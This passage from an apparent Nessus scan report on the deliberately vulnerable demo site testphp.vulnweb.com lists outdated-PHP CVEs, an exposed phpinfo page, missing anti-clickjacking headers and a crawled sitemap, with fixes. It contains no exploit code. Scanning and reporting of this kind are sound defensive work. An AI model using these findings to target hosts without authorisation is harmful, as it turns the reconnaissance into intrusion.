by one. + + false + Unproven + No exploit is required + php_5_2_9.nasl + 2009/02/26 + 2021/01/19 + PHP < 5.2.9 Multiple Vulnerabilities + 2009/02/27 + remote + Low + Medium + 1.14 + 34081 + http://news.php.net/php.internals/42762 + http://www.php.net/releases/5_2_9.php + http://www.php.net/ChangeLog-5.php#5.2.9 + + Upgrade to PHP version 5.2.9 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 3.6 + Secunia:34081 + CWE:20 + CWE:200 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.9 + + + + 730 days + + 51954 + 53403 + 55297 + cpe:/a:php:php + CVE-2011-1398 + CVE-2012-0831 + CVE-2012-1172 + 5.9 + 6.8 + CVE-2012-0831 + 5.3 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P + According to its banner, the version of PHP installed on the remote host is earlier than + 5.3.11, and as such is potentially affected by multiple vulnerabilities : + + - During the import of environment variables, temporary changes to the 'magic_quotes_gpc' + directive are not handled properly. This can lower the difficulty for SQL injection attacks. + (CVE-2012-0831) + + - The '$_FILES' variable can be corrupted because the names of uploaded files are not + properly validated. + (CVE-2012-1172) + + - The 'open_basedir' directive is not properly handled by the functions 'readline_write_history' + and 'readline_read_history'. + + - The 'header()' function does not detect multi-line headers with a CR. (Bug #60227 / + CVE-2011-1398) + + false + Unproven + No exploit is required + php_5_3_11.nasl + 2012/04/26 + 2021/01/19 + PHP < 5.3.11 Multiple Vulnerabilities + 2012/05/02 + remote + Low + Medium + 1.16 + http://www.nessus.org/u?e81d4026 + https://bugs.php.net/bug.php?id=61043 + https://bugs.php.net/bug.php?id=54374 + https://bugs.php.net/bug.php?id=60227 + https://marc.info/?l=oss-security&m=134626481806571&w=2 + http://www.php.net/archive/2012.php#id2012-04-26-1 + http://www.php.net/ChangeLog-5.php#5.3.11 + + Upgrade to PHP version 5.3.11 or later. + The remote web server uses a version of PHP that is affected by multiple vulnerabilities. + + Very Low + No recorded events + No recorded events + 5.9 + 2012/02/09 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.3.11 + + + + 730 days + + 49754 + 50907 + 51193 + 51806 + 51952 + 51992 + 52043 + cpe:/a:php:php + CVE-2011-3379 + CVE-2011-4566 + CVE-2011-4885 + CVE-2012-0057 + CVE-2012-0781 + CVE-2012-0788 + CVE-2012-0789 + 2.7 + 7.5 + 6.5 + CVSS2#E:H/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + According to its banner, the version of PHP installed on the remote host is older than + 5.3.9. As such, it may be affected by the following security issues : + + - The 'is_a()' function in PHP 5.3.7 and 5.3.8 triggers a call to '__autoload()'. + (CVE-2011-3379) + + - It is possible to create a denial of service condition by sending multiple, specially crafted + requests containing parameter values that cause hash collisions when computing the hash values for + storage in a hash table. (CVE-2011-4885) + - An integer overflow exists in the exif_process_IFD_TAG function in exif.c that can allow a remote + attacker to read arbitrary memory locations or cause a denial of service condition. This + vulnerability only affects PHP 5.4.0beta2 on 32-bit platforms. (CVE-2011-4566) + + - Calls to libxslt are not restricted via xsltSetSecurityPrefs(), which could allow an attacker to + create or overwrite files, resulting in arbitrary code execution. (CVE-2012-0057) + + - An error exists in the function 'tidy_diagnose' that can allow an attacker to cause the + application to dereference a NULL pointer. This causes the application to crash. (CVE-2012-0781) + + - The 'PDORow' implementation contains an error that can cause application crashes when + interacting with the session feature. (CVE-2012-0788) + + - An error exists in the timezone handling such that repeated calls to the function 'strtotime' + can allow a denial of service attack via memory consumption. + (CVE-2012-0789) + + false + High + true + No exploit is required + true + php_5_3_9.nasl + 2012/01/11 + 2021/01/19 + PHP < 5.3.9 Multiple Vulnerabilities + 2012/01/13 + remote + Low + High + 1.24 + https://www.tenable.com/security/research/tra-2012-01 + http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Application_PHP5 + http://www.php.net/archive/2012.php#id2012-01-11-1 + https://seclists.org/bugtraq/2012/Jan/91 + https://bugs.php.net/bug.php?id=55475 + https://bugs.php.net/bug.php?id=55776 + https://bugs.php.net/bug.php?id=53502 + http://www.php.net/ChangeLog-5.php#5.3.9 + + Upgrade to PHP version 5.3.9 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + > 365 days + No recorded events + TRA-2012-01 + 5.7 + 2011/09/23 + TRA:TRA-2012-01 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.3.9 + + + + 730 days + + 53388 + CANVAS + 520827 + cpe:/a:php:php + CVE-2012-1823 + 5.9 + 7.5 + CVE-2012-1823 + 6.5 + CVSS2#E:H/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + According to its banner, the version of PHP installed on the remote host is earlier than + 5.3.12 / 5.4.2, and as such is potentially affected by a remote code execution and information + disclosure vulnerability. + + An error in the file 'sapi/cgi/cgi_main.c' can allow a remote attacker to obtain PHP + source code from the web server or to potentially execute arbitrary code. In vulnerable + configurations, PHP treats certain query string parameters as command line arguments including + switches such as '-s', '-d', and '-c'. + + Note that this vulnerability is exploitable only when PHP is used in CGI-based configurations. + Apache with 'mod_php' is not an exploitable configuration. + + true + High + true + true + true + Exploits are available + true + php_5_4_2.nasl + PHP CGI Argument Injection + 2012/05/03 + 2021/09/27 + PHP < 5.3.12 / 5.4.2 CGI Query String Code Execution + 2012/05/04 + remote + Low + High + 1.24 + http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ + https://bugs.php.net/bug.php?id=61910 + http://www.php.net/archive/2012.php#id2012-05-03-1 + http://www.php.net/ChangeLog-5.php#5.3.12 + http://www.php.net/ChangeLog-5.php#5.4.2 + + Upgrade to PHP version 5.3.12 / 5.4.2 or later. A 'mod_rewrite' workaround is + available as well. + + The remote web server uses a version of PHP that is affected by a remote code execution + vulnerability. + + Very Low + 30 to 120 days + No recorded events + 9.0 + 2012/05/03 + CERT:520827 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.3.12 / 5.4.2 + + + + cpe:/a:php:php + 7.5 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + 5.0 + DoS + manual + CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P + According to its self-reported version number, the version of PHP running on the remote web + server is prior to 7.3.24. It is, therefore affected by multiple vulnerabilities + + php_7_3_24.nasl + 2020-A-0510-S + 2020/10/29 + 2021/06/03 + PHP < 7.3.24 Multiple Vulnerabilities + 2020/11/06 + remote + Medium + 1.4 + https://www.php.net/ChangeLog-7.php#7.3.24 + Upgrade to PHP version 7.3.24 or later. + I + The version of PHP running on the remote web server is affected by multiple vulnerabilities. + + 2020/10/29 + IAVA:2020-A-0510-S + + URL : http://testphp.vulnweb.com/ (5.1.6 under http://testphp.vulnweb.com/secured/phpinfo.php) + Installed version : 5.1.6 + Fixed version : 7.3.24 + + + + cpe:/a:php:php + 5.3 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + 5.0 + Score based on analysis of the vendor advisory. + manual + CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N + According to its self-reported version number, the version of PHP running on the remote web + server is prior to 7.3.28. + It is, therefore affected by an email header injection vulnerability, due to a failure to properly + handle CR-LF sequences in header fields. An unauthenticated, remote attacker can exploit this, by + inserting line feed characters into email headers, to gain full control of email header content. + + php_7_3_28.nasl + 2021/04/29 + 2021/08/26 + PHP < 7.3.28 Email Header Injection + 2021/08/26 + remote + Medium + 1.1 + https://www.php.net/ChangeLog-7.php#7.3.28 + Upgrade to PHP version 7.3.28 or later. + The version of PHP running on the remote web server is affected by an email header injection + vulnerability. + + 2021/04/29 + + URL : http://testphp.vulnweb.com/ (5.1.6 under http://testphp.vulnweb.com/secured/phpinfo.php) + Installed version : 5.1.6 + Fixed version : 7.3.28 + + + + 730 days + + 65673 + cpe:/a:php:php + CVE-2012-1171 + 3.4 + 5.0 + 3.7 + CVSS2#E:U/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N + According to its banner, the version of PHP 5.x installed on the remote host is 5.x prior + to 5.3.11 or 5.4.x prior to 5.4.1 and thus, is potentially affected by a security bypass + vulnerability. + + An error exists related to the function 'PHP_RSHUTDOWN_FUNCTION' in the libxml extension + and the 'stream_close' method that could allow a remote attacker to bypass 'open_basedir' + protections and obtain sensitive information. + + Note that this plugin has not attempted to exploit this issue, but has instead relied only on PHP's + self-reported version number. + + false + Unproven + No exploit is required + php_rshutdown_open_basedir_bypass.nasl + 2012/03/12 + 2021/01/19 + PHP PHP_RSHUTDOWN_FUNCTION Security Bypass + 2014/04/01 + remote + Low + Medium + 1.9 + http://www.nessus.org/u?bcc428c2 + https://bugs.php.net/bug.php?id=61367 + + Upgrade to PHP version 5.3.11 / 5.4.1 or later. + The remote web server uses a version of PHP that is potentially affected by a security bypass + vulnerability. + + Very Low + No recorded events + No recorded events + 3.4 + 2012/03/12 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.3.11 / 5.4.1 + + + + cpe:/a:php:php + 10.0 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + 10.0 + Unsupported Software + manual + CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C + According to its version, the installation of PHP on the remote host is no longer + supported. + + Lack of support implies that no new security patches for the product will be released by the vendor. + As a result, it is likely to contain security vulnerabilities. + + php_unsupported.nasl + 0001-A-0581 + 2021/02/15 + PHP Unsupported Version Detection + 2012/05/04 + remote + Critical + 1.21 + http://php.net/eol.php + https://wiki.php.net/rfc/releaseprocess + + Upgrade to a version of PHP that is currently supported. + The remote host contains an unsupported version of a web application scripting language. + + true + IAVA:0001-A-0581 + + Source : X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 + Installed version : 5.6.40-38+ubuntu20.04.1+deb.sury.org+1 + End of support date : 2018/12/31 + Announcement : http://php.net/supported-versions.php + Supported versions : 7.3.x / 7.4.x / 8.0.x + + + + cpe:/a:php:php + 10.0 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + 10.0 + Unsupported Software + manual + CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C + According to its version, the installation of PHP on the remote host is no longer + supported. + + Lack of support implies that no new security patches for the product will be released by the vendor. + As a result, it is likely to contain security vulnerabilities. + + php_unsupported.nasl + 0001-A-0581 + 2021/02/15 + PHP Unsupported Version Detection + 2012/05/04 + remote + Critical + 1.21 + http://php.net/eol.php + https://wiki.php.net/rfc/releaseprocess + + Upgrade to a version of PHP that is currently supported. + The remote host contains an unsupported version of a web application scripting language. + + true + IAVA:0001-A-0581 + + Source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + End of support date : 2006/08/24 + Announcement : http://php.net/eol.php + Supported versions : 7.3.x / 7.4.x / 8.0.x + + + + True + cpe:/a:php:php + Nessus was able to determine the version of PHP available on the remote web server. + + php_version.nasl + 0001-T-0936 + 2020/09/22 + PHP Version Detection + 2010/08/04 + remote + None + 1.25 + n/a + It was possible to obtain the version number of the remote PHP installation. + IAVT:0001-T-0936 + + Nessus was able to identify the following PHP version information : + + Version : 5.1.6 + Source : http://testphp.vulnweb.com/secured/phpinfo.php + + Version : 5.6.40-38+ubuntu20.04.1+deb.sury.org+1 + Source : X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 + + + + cpe:/a:php:php + 5.3 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + 5.0 + score from an analysis done by Tenable + manual + CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N + Many PHP installation tutorials instruct the user to create a PHP file that calls the PHP + function 'phpinfo()' for debugging purposes. Various PHP applications may also include + such a file. By accessing such a file, a remote attacker can discover a large amount of information + about the remote web server, including : + + - The username of the user who installed PHP and if they are a SUDO user. + + - The IP address of the host. + + - The version of the operating system. + + - The web server version. + + - The root directory of the web server. + + - Configuration information about the remote PHP installation. + + phpinfo.nasl + 2021/02/15 + Web Server info.php / phpinfo.php Detection + 2003/02/12 + remote + Medium + 1.20 + Remove the affected file(s). + The remote web server contains a PHP script that is prone to an information disclosure + attack. + + + Nessus discovered the following URL that calls phpinfo() : + + - http://testphp.vulnweb.com/secured/phpinfo.php + + + + True + This plugin attempts to determine the type and the version of the remote web server. + + http_version.nasl + 0001-T-0931 + 2020/10/30 + HTTP Server Type and Version + 2000/01/04 + remote + None + 1.141 + n/a + A web server is running on the remote host. + IAVT:0001-T-0931 + The remote web server type is : + + nginx/1.19.0 + + + + The remote web server in some responses sets a permissive Content-Security-Policy (CSP) + frame-ancestors response header or does not set one at all. + + The CSP frame-ancestors header has been proposed by the W3C Web Application Security Working Group + as a way to mitigate cross-site scripting and clickjacking attacks. + + http_X_Content_Security_Policy_header.nasl + 2021/01/19 + Missing or Permissive Content-Security-Policy frame-ancestors HTTP Response Header + + 2010/10/26 + remote + None + 1.6 + http://www.nessus.org/u?55aa8f57 + http://www.nessus.org/u?07cc2a06 + https://content-security-policy.com/ + https://www.w3.org/TR/CSP2/ + + Set a non-permissive Content-Security-Policy frame-ancestors header for all requested + resources. + + The remote web server does not take steps to mitigate a class of web application + vulnerabilities. + + + The following pages do not set a Content-Security-Policy frame-ancestors response header or set a + permissive policy: + + - http://testphp.vulnweb.com/ + - http://testphp.vulnweb.com/AJAX/ + - http://testphp.vulnweb.com/AJAX/index.php + - http://testphp.vulnweb.com/AJAX/index.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/showxml.php + - http://testphp.vulnweb.com/CVS/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html + - http://testphp.vulnweb.com/Templates/ + - http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php + - http://testphp.vulnweb.com/admin/ + - http://testphp.vulnweb.com/artists.php + - http://testphp.vulnweb.com/cart.php + - http://testphp.vulnweb.com/categories.php + - http://testphp.vulnweb.com/disclaimer.php + - http://testphp.vulnweb.com/guestbook.php + - http://testphp.vulnweb.com/hpp/ + - http://testphp.vulnweb.com/images/ + - http://testphp.vulnweb.com/index.php + - http://testphp.vulnweb.com/listproducts.php + - http://testphp.vulnweb.com/login.php + - http://testphp.vulnweb.com/search.php + - http://testphp.vulnweb.com/secured/ + - http://testphp.vulnweb.com/secured/newuser.php + - http://testphp.vulnweb.com/signup.php + + + + The remote web server in some responses sets a permissive X-Frame-Options response header + or does not set one at all. + + The X-Frame-Options header has been proposed by Microsoft as a way to mitigate clickjacking attacks + and is currently supported by all major browser vendors + + http_X_Frame_Options_header.nasl + 2021/01/19 + Missing or Permissive X-Frame-Options HTTP Response Header + 2010/10/26 + remote + None + 1.5 + https://en.wikipedia.org/wiki/Clickjacking + http://www.nessus.org/u?399b1f56 + + Set a properly configured X-Frame-Options header for all requested resources. + The remote web server does not take steps to mitigate a class of web application + vulnerabilities. + + + The following pages do not set a X-Frame-Options response header or set a permissive policy: + + - http://testphp.vulnweb.com/ + - http://testphp.vulnweb.com/AJAX/ + - http://testphp.vulnweb.com/AJAX/index.php + - http://testphp.vulnweb.com/AJAX/index.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/showxml.php + - http://testphp.vulnweb.com/CVS/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html + - http://testphp.vulnweb.com/Templates/ + - http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php + - http://testphp.vulnweb.com/admin/ + - http://testphp.vulnweb.com/artists.php + - http://testphp.vulnweb.com/cart.php + - http://testphp.vulnweb.com/categories.php + - http://testphp.vulnweb.com/disclaimer.php + - http://testphp.vulnweb.com/guestbook.php + - http://testphp.vulnweb.com/hpp/ + - http://testphp.vulnweb.com/images/ + - http://testphp.vulnweb.com/index.php + - http://testphp.vulnweb.com/listproducts.php + - http://testphp.vulnweb.com/login.php + - http://testphp.vulnweb.com/search.php + - http://testphp.vulnweb.com/secured/ + - http://testphp.vulnweb.com/secured/newuser.php + - http://testphp.vulnweb.com/signup.php + + + + 4.3 + CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N + 693 + The remote web server does not set an X-Frame-Options response header or a + Content-Security-Policy 'frame-ancestors' response header in all content responses. This + could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can + trick a user into clicking an area of the vulnerable page that is different than what the user + perceives the page to be. This can result in a user performing fraudulent or malicious transactions. + + X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is + currently supported by all major browser vendors. + + Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, + with increasing support among all major browser vendors, as a way to mitigate clickjacking and other + attacks. The 'frame-ancestors' policy directive restricts which sources can embed the + protected resource. + + Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only + mitigations for clickjacking, they are currently the most reliable methods that can be detected + through automation. Therefore, this plugin may produce false positives if other mitigation + strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any + security-sensitive transactions. + + http_generic_clickjacking.nasl + 2017/05/16 + Web Application Potentially Vulnerable to Clickjacking + 2015/08/22 + remote + Medium + $Revision: 1.7 $ + http://www.nessus.org/u?399b1f56 + https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet + https://en.wikipedia.org/wiki/Clickjacking + + Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' + directive) HTTP header with the page's response. + This prevents the page's content from being rendered by another site when using the frame or + iframe HTML tags. + + The remote web server may fail to mitigate a class of web application vulnerabilities. + + CWE:693 + + The following pages do not use a clickjacking mitigation response header and contain a clickable + event : + + - http://testphp.vulnweb.com/ + - http://testphp.vulnweb.com/AJAX/ + - http://testphp.vulnweb.com/AJAX/index.php + - http://testphp.vulnweb.com/AJAX/index.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php + - http://testphp.vulnweb.com/artists.php + - http://testphp.vulnweb.com/cart.php + - http://testphp.vulnweb.com/categories.php + - http://testphp.vulnweb.com/disclaimer.php + - http://testphp.vulnweb.com/guestbook.php + - http://testphp.vulnweb.com/index.php + - http://testphp.vulnweb.com/listproducts.php + - http://testphp.vulnweb.com/login.php + - http://testphp.vulnweb.com/search.php + - http://testphp.vulnweb.com/signup.php + + + + The remote web server contains linkable content that can be used to gather information + about a target. + + http_sitemap.nasl + 2016/06/24 + Web Application Sitemap + 2016/06/24 + remote + None + $Revision: 1.1 $ + http://www.nessus.org/u?5496c8d9 + n/a + The remote web server hosts linkable content that can be crawled by Nessus. + + The following sitemap was created from crawling linkable content on the target host : + + - http://testphp.vulnweb.com/ + - http://testphp.vulnweb.com/AJAX/ + - http://testphp.vulnweb.com/AJAX/index.php + - http://testphp.vulnweb.com/AJAX/index.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/.php + - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php + - http://testphp.vulnweb.com/AJAX/showxml.php + - http://testphp.vulnweb.com/AJAX/styles.css + - http://testphp.vulnweb.com/CVS/ + - http://testphp.vulnweb.com/CVS/Entries + - http://testphp.vulnweb.com/CVS/Entries.Log + - http://testphp.vulnweb.com/CVS/Repository + 